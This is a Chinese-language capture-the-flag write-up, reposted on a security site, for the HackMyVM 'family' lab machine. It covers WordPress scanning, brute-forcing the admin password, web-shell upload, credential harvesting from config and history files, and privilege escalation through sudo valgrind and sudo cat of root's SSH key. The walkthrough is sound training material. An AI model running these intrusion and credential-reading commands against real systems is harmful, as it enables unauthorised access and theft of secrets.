hackmyvm-family

admin
admin
admin
138674
文章
114
评论
2025年4月9日20:38:47评论8 views字数 5988阅读19分57秒阅读模式

hackmyvm-family

ssh://192.168.69.31         ssh                        Info:protocol2.0,Port:22,ProductName:OpenSSH,Version:7.9p1Debian10+deb10u2,Digest:"SSH-2.0-OpenSSH_7.9p1D,OperatingSystem:Linux,Length:41

http://192.168.69.31        Indexof/                   Port:80,Digest:n

Apach,Length:905,FingerPrint:列目录;Apache;Index-Of;开源-WordPress

可以看到又是一个wordpress站点

[+] URL: http://192.168.69.31/wordpress/ [192.168.69.31] [+] Started: Mon Mar 31 22:09:25 2025

Interesting Finding(s):

[+] Headers | Interesting Entry: Server: Apache/2.4.38 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.69.31/wordpress/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: |  - http://codex.wordpress.org/XML-RPC_Pingback_API |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.69.31/wordpress/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.69.31/wordpress/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.69.31/wordpress/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: |  - https://www.iplocation.net/defend-wordpress-from-ddos |  - Issue #1299 · wpscanteam/wpscan

[+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15). | Found By: Emoji Settings (Passive Detection) |  - http://192.168.69.31/wordpress/, Match: 'wp-includes/js/wp-emoji-release.min.js?ver=5.7.1' | Confirmed By: Meta Generator (Passive Detection) |  - http://192.168.69.31/wordpress/, Match: 'WordPress 5.7.1'

[i] The main theme could not be detected.

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:00:01 <===================================================================================================================> (652 / 652) 100.00% Time: 00:00:01

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:00:02 <=================================================================================================================> (2568 / 2568) 100.00% Time: 00:00:02

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 <====================================================================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods) Checking DB Exports - Time: 00:00:00 <==========================================================================================================================> (75 / 75) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected) Brute Forcing Attachment IDs - Time: 00:00:04 <===============================================================================================================> (100 / 100) 100.00% Time: 00:00:04

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <=====================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Mar 31 22:09:56 2025 [+] Requests Done: 3581 [+] Cached Requests: 4 [+] Data Sent: 1.028 MB [+] Data Received: 574.631 KB [+] Memory used: 267.664 MB [+] Elapsed time: 00:00:31

爆破用户出了点问题,似乎要配hosts

[SUCCESS] - admin / phantom Trying admin / phantom Time: 00:02:36 <                                                                                                                   > (2010 / 15039185)  0.01%  ETA: ??:??:??

[!] Valid Combinations Found: | Username: admin, Password: phantom

依然登录上去,上传shell,反弹一条龙

看下mysql账号密码

/** Utilisateur de la base de données MySQL. */ define( 'DB_USER', 'admin' );

/** Mot de passe de la base de données MySQL. */ define( 'DB_PASSWORD', 'phantom' );

/var/www下有个.bash_history

export TERM=xterm clear cd /home ls cd baby cd mother cd father clear find / -group www-data -type f 2>/dev/null | grep -v /var/www find / -group www-data -type f 2>/dev/null | grep -v -E "/var/www|proc" cat /usr/share/perl/5.28.1/perso.txt ls -l /usr/share/perl/5.28.1/perso.txt su - father export TERM=xterm clear sudo -l

perso.txt里的密码是

uncrackablepassword

可以su -father

登录father可以看mother的目录

有个.selected_editor

Generated by /usr/bin/select-editor

SELECTED_EDITOR="/bin/nano"

没啥用

sudo -l 看了没东西

pspy64看看

hackmyvm-family

有个check.py定时任务,但是没这个文件,可以反弹个shell

反弹shell 获得mother权限,看看提权

User mother may run the following commands on family: (baby) NOPASSWD: /usr/bin/valgrind mother@family:~$

valgrind提权较为简单

sudo -u baby valgrind bash即可获得baby权限

获取user.txt Chilatyfile

hackmyvm-family

然后看看baby提权

User baby may run the following commands on family: (ALL : ALL) NOPASSWD: /usr/bin/cat

这就更粗暴了

sudo /usr/bin/cat /root/.ssh/id_rsa

登录上去直接跳了个logo,然后自动退出了

因此要用命令行进入非交互模式

ssh -i id_rsa [email protected] /bin/bash

试了下不行,是我想多了

应该是more时输入!/bin/bash跳过

hackmyvm-family

找到flag.txt - Selmorbormir

目标系统信息

  • SSH服务

    • 地址: ssh://192.168.69.31:22
    • 协议: SSH-2.0
    • 版本: OpenSSH 7.9p1 Debian 10+deb10u2
    • 操作系统: Linux

  • HTTP服务

    • 地址: http://192.168.69.31:80
    • Web服务器: Apache/2.4.38 (Debian)
    • 目录列表暴露: /wordpress/wp-content/uploads/
    • WordPress版本: 5.7.1(存在已知漏洞)

关键发现

  1. WordPress漏洞

    • XML-RPC接口开放(潜在DDoS/暴力破解风险)
    • 可读readme.html暴露版本信息
    • 外部WP-Cron启用(可能被滥用)

  2. 用户凭据

    • 爆破成功: 用户 admin / 密码 phantom
    • MySQL凭据: 用户 admin / 密码 phantom

  3. 权限提升路径

    • 通过.bash_history发现密码 uncrackablepassword → 切换用户至 father
    • 定时任务(check.py未找到,但可反弹Shell)
    • 用户 mother 可通过 valgrind 提权至 baby
    • 用户 baby 拥有无密码 sudo cat 权限,最终读取 /root/.ssh/id_rsa

提权结果

  • Root权限获取

    • 通过SSH私钥登录后触发自动退出,需用非交互模式(如 more 中执行 !/bin/bash)绕过。
    • 最终获取根目录Flag: Selmorbormir

原文始发于微信公众号(BlueIris):hackmyvm-family

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月9日20:38:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   hackmyvm-familyhttps://cn-sec.com/archives/3935028.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息